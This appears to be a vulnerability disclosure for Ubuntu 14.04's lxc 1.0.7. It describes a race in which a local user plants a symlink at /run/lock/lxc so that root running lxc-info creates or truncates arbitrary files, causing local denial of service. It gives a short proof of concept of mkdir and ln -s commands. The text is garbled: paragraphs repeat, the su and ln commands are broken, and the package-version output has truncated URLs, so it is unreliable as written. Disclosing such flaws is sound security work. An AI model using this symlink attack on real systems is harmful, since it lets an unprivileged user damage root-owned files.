When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS
When lxc tools, e.g. lxc-info is run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. Therefore the malicious user has to be faster than the first lxc invocation so that /run/lock/lxc does not yet exist.
POC:
# su -s /bin/bash nobody lib/lxc/ somename
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/
As root:
lxc-info --name somename
The guest "somename" has to exist, the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause local DoS
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc archivexxx/ ubuntu/ trusty-updates/main amd64 Packages dpkg/status archivexxx/ ubuntu/ trusty/main amd64 Packages
lxc:
Installed: 1.0.7-0ubuntu0.1
Candidate: 1.0.7-0ubuntu0.1
Version table:
*** 1.0.7-0ubuntu0.1 0
500 http://
100 /var/lib/
1.0.3-0ubuntu3 0
500 http://